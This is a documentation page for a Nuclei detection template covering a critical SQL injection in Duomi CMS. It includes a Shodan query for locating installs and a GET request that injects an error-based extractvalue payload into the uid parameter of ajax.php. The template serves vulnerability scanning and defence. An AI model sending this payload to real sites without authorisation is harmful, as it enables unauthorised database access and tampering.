Duomi CMS - SQL Injection
ID: duomicms-sql-injection
Severity: critical
Author: pikpikcu
Tags: duomicms,sqli
Description
Section titled “Description”Duomi CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: duomicms-sql-injection
info: name: Duomi CMS - SQL Injection author: pikpikcu severity: critical description: Duomi CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://redn3ck.github.io/2016/11/01/duomiCMS/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cwe-id: CWE-89 metadata: verified: true max-request: 1 shodan-query: title:"DuomiCMS" tags: duomicms,sqlivariables: num: "999999999"
http: - method: GET path: - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"
matchers-condition: and matchers: - type: word words: - '{{md5({{num}})}}'
- type: status status: - 200# digest: 4a0a0047304502203751c5e1a1f85d2ca644dde8e96d3dd85558bfbc019312059fdbb5724cdfe5c0022100a228ebe6c538f3951eaa86477facd1a349fa544709c989047253e287fc53ea93:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/duomicms-sql-injection.yaml"